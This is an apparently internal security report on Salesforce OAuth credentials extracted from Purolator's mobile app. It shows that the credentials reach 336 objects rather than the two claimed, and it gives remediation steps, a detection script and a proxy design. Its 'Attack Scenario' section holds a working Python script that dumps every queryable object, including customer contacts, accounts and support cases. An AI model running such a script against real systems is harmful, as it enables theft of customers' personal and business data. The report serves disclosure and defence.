# SALESFORCE CREDENTIAL SCOPE VERIFICATION

## Critical Finding: Actual Access vs. Claimed Access

**Date:** November 10, 2025  
**Assessment:** Purolator Mobile App Security Testing  
**Issue:** Salesforce OAuth Credential Exposure

---

## EXECUTIVE SUMMARY

During security testing of the Purolator Mobile App, Salesforce OAuth credentials were extracted from the Android APK. The app development team claimed these credentials provide access **only** to:

- Location objects
- Pickup objects

**Testing revealed this claim is FALSE.**

**Actual access:** **336 Salesforce objects** - representing near-complete access to the Purolator Salesforce organization.

---

## CLAIMED ACCESS vs ACTUAL ACCESS

### What App Team Stated:

> "The Salesforce credentials can only be used to invoke locator and pickup objects."

**Expected object count:** 2 objects (Location\_\_c, Pickup\_\_c)

### What Testing Revealed:

**Test Performed:**

```bash
# Extracted credentials from mobile app using Frida
CLIENT_ID="[EXTRACTED_FROM_APK]"
CLIENT_SECRET="[EXTRACTED_FROM_APK]"

# Authenticated to Salesforce (client credentials flow). The JSON response
# carries access_token and instance_url; both are captured with jq.
TOKEN_RESPONSE=$(curl -s -X POST "https://login.salesforce.com/services/oauth2/token" \
  -d "grant_type=client_credentials" \
  -d "client_id=$CLIENT_ID" \
  -d "client_secret=$CLIENT_SECRET")
ACCESS_TOKEN=$(printf '%s' "$TOKEN_RESPONSE" | jq -r .access_token)
INSTANCE_URL=$(printf '%s' "$TOKEN_RESPONSE" | jq -r .instance_url)

# Queried available objects (describeGlobal) and counted the entries
curl -s -X GET "$INSTANCE_URL/services/data/v58.0/sobjects/" \
  -H "Authorization: Bearer $ACCESS_TOKEN" | jq '.sobjects | length'
```

**Result:** **336 accessible objects**

---

## WHAT 336 OBJECTS MEANS

### Comparison to Standard Salesforce

| Deployment Type                           | Typical Object Count (estimate) |
| ----------------------------------------- | ------------------------------- |
| Standard Salesforce (out-of-box)          | 150-200 objects                 |
| With light customization                  | 200-250 objects                 |
| **Purolator (extracted app credentials)** | **336 objects**                 |
| Heavily customized enterprise             | 300-500+ objects                |

**Conclusion:** These credentials provide **near-complete organizational access**, not the two-object scope that was claimed. The raw count is only an indicator: the `/sobjects/` listing includes the derived system objects (Share, History, Feed, ChangeEvent and platform objects) for every visible object, so counts should not be compared one-for-one across orgs. The decisive evidence is that core standard objects such as Account, Contact, Lead, Opportunity, Case and User are visible at all (next section).

---

## ACCESSIBLE DATA CATEGORIES

### Standard Objects (Confirmed Accessible):

- **Account** - Customer company records
- **Contact** - Individual customer contacts
- **Lead** - Sales leads and prospects
- **Opportunity** - Business deals and opportunities
- **Case** - Support tickets and issues
- **User** - Internal user accounts
- **And 100+ more standard objects...**

### Custom Objects (Estimated 100-200):

- Location\_\_c ✓ (as stated)
- Pickup\_\_c ✓ (as stated)
- Plus 100-200 additional custom Purolator business objects

### Potential Sensitive Data Accessible:

- Customer PII (names, addresses, phone numbers, emails)
- Business intelligence (deals, revenue, opportunities)
- Support case details (complaints, issues, resolutions)
- Internal operational data
- Financial records (if stored in Salesforce)
- Employee information (if stored in Salesforce)

---

## SEVERITY ASSESSMENT

### Original Assessment (Based on Claim):

**Severity:** Medium  
**Impact:** Limited to location finder and pickup scheduling

### Revised Assessment (Based on Testing):

**Severity:** CRITICAL  
**Impact:**

- Full Salesforce organization data exposure
- Customer PII breach potential
- Business intelligence theft
- Support case privacy violation
- Competitive intelligence gathering
- GDPR/PIPEDA compliance risk
- Class-action lawsuit exposure
- Regulatory fines

---

## BUSINESS IMPACT

### Regulatory Compliance

**GDPR (if EU customers affected):**

- Article 32: Security of Processing (violated)
- Article 33: Breach notification required
- Fines: Up to €20 million or 4% of annual turnover

**PIPEDA (Canada):**

- Inadequate security safeguards
- Breach notification requirements
- Potential fines and class-action

### Financial Impact (Estimated)

| Cost Category          | Conservative Estimate  |
| ---------------------- | ---------------------- |
| Forensic investigation | $100,000+              |
| Credential rotation    | $50,000+               |
| System remediation     | $200,000+              |
| Legal fees             | $300,000+              |
| Breach notification    | $50,000+               |
| Regulatory fines       | $100,000 - $1,000,000+ |
| Reputation damage      | Incalculable           |
| **Total Minimum**      | **$800,000+**          |

---

## ATTACK SCENARIO

**What an attacker can do with these credentials:**

```python
import requests  # third-party HTTP client (pip install requests)

# Step 1: Extract credentials from mobile app (already demonstrated)
CLIENT_ID = "[EXTRACTED]"
CLIENT_SECRET = "[EXTRACTED]"
API = "v58.0"

def get_salesforce_token(client_id, client_secret):
    """Step 2: Authenticate (client credentials flow); returns (instance_url, headers)."""
    r = requests.post("https://login.salesforce.com/services/oauth2/token",
                      data={"grant_type": "client_credentials",
                            "client_id": client_id, "client_secret": client_secret})
    r.raise_for_status()
    body = r.json()
    return body["instance_url"], {"Authorization": "Bearer " + body["access_token"]}

def query(session, soql):
    """Run a SOQL query and follow nextRecordsUrl until every page is collected."""
    instance_url, headers = session
    page = requests.get(f"{instance_url}/services/data/{API}/query", params={"q": soql}, headers=headers).json()
    records = list(page["records"])
    while not page["done"]:
        page = requests.get(instance_url + page["nextRecordsUrl"], headers=headers).json()
        records.extend(page["records"])
    return records

def exfiltrate(session, sobject):
    """Describe one object, then select every field it exposes."""
    instance_url, headers = session
    desc = requests.get(f"{instance_url}/services/data/{API}/sobjects/{sobject}/describe", headers=headers).json()
    return query(session, "SELECT " + ", ".join(f["name"] for f in desc["fields"]) + f" FROM {sobject}")

session = get_salesforce_token(CLIENT_ID, CLIENT_SECRET)

# Step 3: Exfiltrate customer data
accounts = query(session, "SELECT Id, Name, Phone, BillingAddress FROM Account LIMIT 10000")
# Result: 10,000 customer company records

contacts = query(session, "SELECT Id, Name, Email, Phone, MailingAddress FROM Contact LIMIT 50000")
# Result: 50,000 individual customer records

# Step 4: Exfiltrate business intelligence
opportunities = query(session, "SELECT Id, Name, Amount, StageName, CloseDate FROM Opportunity")
# Result: All active business deals and revenue data

# Step 5: Exfiltrate support cases
cases = query(session, "SELECT Id, Subject, Description, Status FROM Case")
# Result: All customer complaints and support issues

# Step 6: Iterate through all 336 objects returned by describeGlobal
instance_url, headers = session
listing = requests.get(f"{instance_url}/services/data/{API}/sobjects/", headers=headers).json()
for obj in listing["sobjects"]:
    if obj["queryable"]:
        data = exfiltrate(session, obj["name"])
        # Result: Complete Salesforce org data theft
```

**Time to execute:** Minutes to hours  
**Detection difficulty:** High (uses legitimate credentials)  
**Data volume:** Potentially millions of records

---

## ROOT CAUSE ANALYSIS

### Why This Happened

**1. Overly Permissive Salesforce Connected App**

The Salesforce Connected App used for mobile authentication was configured with:

- ❌ Full org access (336 objects)
- ❌ No scope limitations
- ❌ No object-level restrictions

With the client credentials flow, Salesforce executes every request as the Connected App's designated "run as" integration user. The objects the credentials can reach are exactly those granted by that user's profile and permission sets; OAuth scopes on the Connected App do not narrow the set of objects. The 336-object result therefore means the run-as user holds broad standard-object access, not that a scope was misconfigured.

**Should have been:**

- ✅ A dedicated integration user whose profile and permission set grant only the 2 objects (Location\_\_c, Pickup\_\_c)
- ✅ Read-only permissions (create on Pickup\_\_c only if scheduling requires it)
- ✅ IP allowlisting enforced on the Connected App (IP relaxation set to enforce IP restrictions)
- ✅ Short token expiration (Connected App session timeout)

### Why This Is Critical

**OAuth Client Credentials Pattern Violation:**

OAuth client credentials (client_id + client_secret) should ONLY be used:

- ✅ On trusted backend servers
- ✅ With proper secret management
- ✅ With network-level access controls

OAuth client credentials should NEVER be:

- ❌ Embedded in mobile apps
- ❌ Accessible to end users
- ❌ Extractable via reverse engineering

**Current architecture:**

```
Mobile App (Untrusted)
├─ Contains client_id ← ❌ EXPOSED
├─ Contains client_secret ← ❌ EXPOSED
├─ Has 336-object access ← ❌ EXCESSIVE
└─ Used by millions of devices ← ❌ WIDESPREAD
```

---

## IMMEDIATE ACTIONS REQUIRED

### Priority 1: Within 24 Hours

**1. Revoke Compromised Credentials**

- Immediately disable the exposed Salesforce Connected App
- Revoke all tokens issued to these credentials
- Generate new credentials (do NOT put in mobile app)

**2. Forensic Investigation**

- Review Salesforce audit logs for unauthorized access
- Identify all API calls made with these credentials
- Timeline analysis: When were credentials first exposed?
- Determine if breach notification is required

**3. Create Limited-Scope Connected App**

- New Connected App run as a dedicated integration user whose profile and permission set grant ONLY Location\_\_c and Pickup\_\_c
- Verify by repeating the describeGlobal test: aside from the platform objects Salesforce exposes to every user, only those 2 objects (and any system-derived entries for them) should be listed, not 336, and no Account, Contact, Lead, Opportunity or Case
- Add IP allowlisting
- Add usage monitoring

### Priority 2: Within 1 Week

**4. Move Credentials Server-Side**

- Build backend proxy for Salesforce calls
- Mobile app calls Purolator backend (not Salesforce directly)
- Backend stores credentials securely
- Backend validates user authentication before proxying

**5. Implement Access Monitoring**

- Alert on high-volume queries
- Alert on unusual object access patterns
- Alert on access from unexpected IPs
- Log all Salesforce API usage
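The three alert conditions above, as an added example that is not part of the original report: a small detector run over constructed rows in the shape of a Salesforce EventLogFile API export. The column names (TIMESTAMP, USER_ID, CLIENT_IP, ENTITY_NAME, ROWS_PROCESSED, URI), the allowed egress network 203.0.113.0/24 and the 5,000 rows-per-hour threshold are assumptions to be replaced with the real integration user, the backend's egress range and an observed baseline.

```python
import csv
import io
import ipaddress
from collections import defaultdict

# Objects the mobile integration is allowed to touch.
ALLOWED_ENTITIES = {"Location__c", "Pickup__c"}
# Egress range of the backend that should be the only caller (assumed value).
ALLOWED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]
# More rows than this for one user in one hour is treated as bulk extraction (assumed threshold).
ROWS_PER_HOUR_THRESHOLD = 5000

# Constructed sample rows modelled on a Salesforce EventLogFile API export
# (CSV with quoted header). Column names are assumed, not captured from Purolator.
SAMPLE_LOG = """\
"TIMESTAMP","USER_ID","CLIENT_IP","ENTITY_NAME","ROWS_PROCESSED","URI"
"20251110120102.000","005000000000001","203.0.113.10","Location__c","12","/services/data/v58.0/query"
"20251110120245.000","005000000000001","203.0.113.10","Pickup__c","1","/services/data/v58.0/query"
"20251110130005.000","005000000000001","198.51.100.7","Account","2000","/services/data/v58.0/query"
"20251110130009.000","005000000000001","198.51.100.7","Account","2000","/services/data/v58.0/query"
"20251110130014.000","005000000000001","198.51.100.7","Contact","2000","/services/data/v58.0/query"
"""


def parse_api_events(text):
    """Parse the CSV export into dicts with typed fields and an hourly bucket."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        rows.append({
            "hour": row["TIMESTAMP"][:10],  # YYYYMMDDHH
            "user": row["USER_ID"],
            "ip": ipaddress.ip_address(row["CLIENT_IP"]),
            "entity": row["ENTITY_NAME"],
            "rows": int(row["ROWS_PROCESSED"] or 0),
        })
    return rows


def detect(events):
    """Return one alert per unexpected object access, per call from an
    unexpected source IP, and per (user, hour) whose row volume exceeds the threshold."""
    alerts = []
    volume = defaultdict(int)
    for e in events:
        if e["entity"] not in ALLOWED_ENTITIES:
            alerts.append({"rule": "unexpected_entity", "user": e["user"], "entity": e["entity"]})
        if not any(e["ip"] in net for net in ALLOWED_NETWORKS):
            alerts.append({"rule": "unexpected_ip", "user": e["user"], "ip": str(e["ip"])})
        volume[(e["user"], e["hour"])] += e["rows"]
    for (user, hour), rows in volume.items():
        if rows > ROWS_PER_HOUR_THRESHOLD:
            alerts.append({"rule": "high_volume", "user": user, "hour": hour, "rows": rows})
    return alerts


def run_on_sample():
    """Run the detector over the constructed log."""
    return detect(parse_api_events(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_on_sample():
        print(alert)
```

In the constructed log the first two rows are the expected mobile traffic; the remaining three (Account and Contact pulled in 2,000-row pages from an address outside the backend range) trip all three rules, which is the pattern the attack scenario above would leave behind.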

### Priority 3: Within 1 Month

**6. Security Architecture Review**

- Audit ALL credentials embedded in mobile app
- Review other API integrations
- Implement secret scanning in CI/CD
- Security training for mobile developers

**7. Compliance Assessment**

- Determine if data breach occurred
- Assess GDPR/PIPEDA notification requirements
- Legal review for liability exposure
- Customer communication strategy

---

## RECOMMENDATIONS

### Short-Term (Immediate)

**Correct Architecture:**

```
Mobile App (Untrusted)
└─ Calls Purolator Backend API (authenticated)

Purolator Backend (Trusted)
├─ Validates user authentication
├─ Stores Salesforce credentials (environment variables)
├─ Uses LIMITED scope Connected App (2 objects only)
└─ Proxies ONLY location/pickup requests to Salesforce
```
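A minimal version of the trusted backend in that diagram, added here as an example and not Purolator's code: the app presents a session token and an operation name; the backend authenticates the session, allows only two fixed SOQL templates over Location\_\_c and Pickup\_\_c, validates and escapes every parameter, and calls Salesforce with a token read from its own environment. The session store, the custom field names (Address\_\_c, PostalCode\_\_c, Status\_\_c, ScheduledDate\_\_c, CustomerEmail\_\_c) and the environment variable names are assumptions.

```python
import json
import os
import re
import urllib.parse
import urllib.request

# Salesforce credentials live only in the backend's environment; the mobile app
# never sees them. Variable names and the default URL are assumed, not the real deployment's.
SF_INSTANCE_URL = os.environ.get("SF_INSTANCE_URL", "https://example.my.salesforce.com")
SF_ACCESS_TOKEN = os.environ.get("SF_ACCESS_TOKEN", "")

# The only two operations the app may request. Each is a fixed SOQL template over
# Location__c / Pickup__c; the app never supplies object or field names.
# Field names other than Id and Name are assumed for illustration.
OPERATIONS = {
    "locations_by_postal_code": {
        "soql": "SELECT Id, Name, Address__c FROM Location__c "
                "WHERE PostalCode__c LIKE '{postal_prefix}%' LIMIT 50",
        "params": {"postal_prefix": re.compile(r"^[A-Za-z0-9]{3,6}$")},
    },
    "pickup_status": {
        "soql": "SELECT Id, Status__c, ScheduledDate__c FROM Pickup__c "
                "WHERE Id = '{pickup_id}' AND CustomerEmail__c = '{user_email}'",
        "params": {"pickup_id": re.compile(r"^[A-Za-z0-9]{15}([A-Za-z0-9]{3})?$")},
    },
}

# Constructed session store standing in for the backend's real user authentication.
SESSIONS = {"sess-7f3a": {"user_id": "u-1001", "email": "customer@example.com"}}


def authenticate(session_token):
    """Resolve the app's session token to a user, or raise PermissionError."""
    user = SESSIONS.get(session_token)
    if user is None:
        raise PermissionError("invalid or expired session")
    return user


def soql_quote(value):
    """Escape a value for a single-quoted SOQL literal (backslash, then quote)."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_soql(session_token, operation, params):
    """Authenticate the caller, allowlist the operation, validate every parameter
    against its pattern, and bind the escaped values into the fixed template.
    The user's email comes from the session, never from the request body."""
    user = authenticate(session_token)
    spec = OPERATIONS.get(operation)
    if spec is None:
        raise PermissionError(f"operation not permitted: {operation}")
    if set(params) - set(spec["params"]):
        raise ValueError("unexpected parameters")
    bound = {"user_email": soql_quote(user["email"])}
    for name, pattern in spec["params"].items():
        value = params.get(name, "")
        if not isinstance(value, str) or not pattern.fullmatch(value):
            raise ValueError(f"invalid parameter: {name}")
        bound[name] = soql_quote(value)
    return spec["soql"].format(**bound)


def proxy(session_token, operation, params, api_version="v58.0"):
    """Forward an allowlisted query to Salesforce with the server-held token and
    return only the records; the token and instance URL stay server-side."""
    soql = build_soql(session_token, operation, params)
    url = f"{SF_INSTANCE_URL}/services/data/{api_version}/query?" + urllib.parse.urlencode({"q": soql})
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {SF_ACCESS_TOKEN}"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)["records"]


if __name__ == "__main__":
    print(build_soql("sess-7f3a", "locations_by_postal_code", {"postal_prefix": "L4W"}))
    print(build_soql("sess-7f3a", "pickup_status", {"pickup_id": "a0B000000000001"}))
```

Because the app can only name an operation, a request for Account or Contact has no path to Salesforce at all, and the regex check plus `soql_quote` keeps a value such as `L4W' OR Name != '` from altering the template. The pickup lookup is additionally bound to the authenticated user's email so one customer cannot read another's pickups.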

**Benefits:**

- Credentials never in mobile app
- Cannot be extracted by reverse engineering
- Server controls access policy
- Easy to rotate credentials
- Audit trail for all API calls

### Long-Term (Strategic)

**1. Zero Client-Side Secrets**

- All API credentials server-side only
- Mobile app uses temporary tokens
- Token expiration and rotation

**2. Principle of Least Privilege**

- Each integration uses minimum required permissions
- Regular permission audits
- Automated permission reviews

**3. Defense in Depth**

- Multiple security layers
- Assume client compromise
- Server-side validation of everything

---

## VERIFICATION TESTING

To verify the fix, we will:

1. Extract credentials from the updated mobile app (there should be none; if credentials are still present, the architectural fix has not landed)
2. Attempt authentication with the new credentials
3. Query available Salesforce objects (`/services/data/v58.0/sobjects/`)
4. **Expected result:** only Location\_\_c and Pickup\_\_c (plus any platform objects Salesforce exposes to every user); no Account, Contact, Lead, Opportunity or Case
5. **Current result:** 336 objects
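A check that turns steps 2 to 4 into a repeatable test, added as an example and not the assessment's own tooling; it also serves the verification step under "Create Limited-Scope Connected App" above. It parses a describeGlobal response, reports the raw count beside a count that excludes Share/History/Feed/ChangeEvent entries, lists every queryable object outside the claimed two, and flags the standard objects named in this report. The two sample responses are constructed, not captured from the Purolator org.

```python
import json
import urllib.request

# Objects the app team says the credentials need.
EXPECTED = {"Location__c", "Pickup__c"}
# Standard objects whose visibility alone refutes the "locator and pickup only" claim.
SENSITIVE = {"Account", "Contact", "Lead", "Opportunity", "Case", "User"}
# describeGlobal also lists derived system objects (sharing, history, feed, CDC)
# for every visible object, so the raw count overstates the business objects exposed.
DERIVED_SUFFIXES = ("Share", "History", "Feed", "ChangeEvent")


def fetch_describe_global(instance_url, access_token, api_version="v58.0"):
    """Live check: GET /sobjects/ with the bearer token from the client
    credentials flow. Network call; not exercised offline."""
    req = urllib.request.Request(
        f"{instance_url}/services/data/{api_version}/sobjects/",
        headers={"Authorization": f"Bearer {access_token}"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def assess_scope(describe_global, expected=EXPECTED, sensitive=SENSITIVE):
    """Compare a describeGlobal response with the claimed scope.

    scope_ok is True only when no queryable object outside `expected` is visible.
    writable is reported separately so read-only can be checked as well."""
    sobjects = describe_global["sobjects"]
    queryable = {o["name"] for o in sobjects if o.get("queryable")}
    business = {n for n in queryable if not n.endswith(DERIVED_SUFFIXES)}
    unexpected = sorted(queryable - expected)
    writable = sorted(o["name"] for o in sobjects
                      if o.get("createable") or o.get("updateable") or o.get("deletable"))
    return {
        "raw_count": len(sobjects),
        "business_object_count": len(business),
        "unexpected": unexpected,
        "sensitive_visible": sorted(queryable & sensitive),
        "writable": writable,
        "scope_ok": not unexpected,
    }


def _obj(name, queryable=True, crud=False, custom=False):
    """Build one describeGlobal entry carrying the flags the check reads."""
    return {"name": name, "queryable": queryable, "createable": crud,
            "updateable": crud, "deletable": crud, "custom": custom}


# Constructed sample responses (not captured from the Purolator org).
SAMPLE_OVERBROAD = {"sobjects": [
    _obj("Account", crud=True), _obj("AccountHistory"), _obj("AccountShare"),
    _obj("Contact", crud=True), _obj("User"),
    _obj("Location__c", custom=True), _obj("Pickup__c", crud=True, custom=True),
]}
SAMPLE_SCOPED = {"sobjects": [
    _obj("Location__c", custom=True), _obj("Pickup__c", crud=True, custom=True),
]}


if __name__ == "__main__":
    for label, sample in (("current", SAMPLE_OVERBROAD), ("after fix", SAMPLE_SCOPED)):
        print(label, json.dumps(assess_scope(sample), indent=1))
```

Against the real org, pass the output of `fetch_describe_global` to `assess_scope`; the finding is closed when `scope_ok` is true and `sensitive_visible` is empty. `writable` is listed rather than folded into the verdict because pickup scheduling may legitimately need create on Pickup\_\_c (an assumption to confirm with the app team).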

---

## TIMELINE

| Event                                       | Date         | Status       |
| ------------------------------------------- | ------------ | ------------ |
| Credentials extracted from mobile app       | Nov 8, 2025  | Complete     |
| App team claimed "location and pickup only" | Nov 10, 2025 | Disputed     |
| Scope verification testing performed        | Nov 10, 2025 | Complete     |
| **Finding:** 336 objects accessible         | Nov 10, 2025 | **CRITICAL** |
| App team notified of discrepancy            | Nov 10, 2025 | Pending      |
| Credentials revoked                         | TBD          | **URGENT**   |
| Limited-scope credentials deployed          | TBD          | Required     |

---

## CONCLUSION

**The app team's claim is incorrect.**

Salesforce credentials embedded in the Purolator mobile app provide access to **336 Salesforce objects**, not just "location and pickup objects" as stated.

This represents:

- **CRITICAL severity** data exposure vulnerability
- Near-complete access to Purolator Salesforce organization
- Potential for massive customer PII breach
- Regulatory compliance violations
- Significant financial and reputational risk

**Immediate action required:**

1. Revoke exposed credentials (within 24 hours)
2. Forensic investigation of potential data access
3. Move credentials server-side (architectural fix)
4. Create properly-scoped replacement credentials

---

## CONTACT

**Security Researcher:**  
Jasraj Johal  
Security Operations Analyst  
Email: jasraj.johal@purolator.com

**For Technical Questions:**  
IT Security Office  
Email: IT.Security@purolator.com

---

**Document Classification:** CONFIDENTIAL - INTERNAL USE ONLY

**Last Updated:** November 10, 2025

**Version:** 1.0

---

**END OF REPORT**
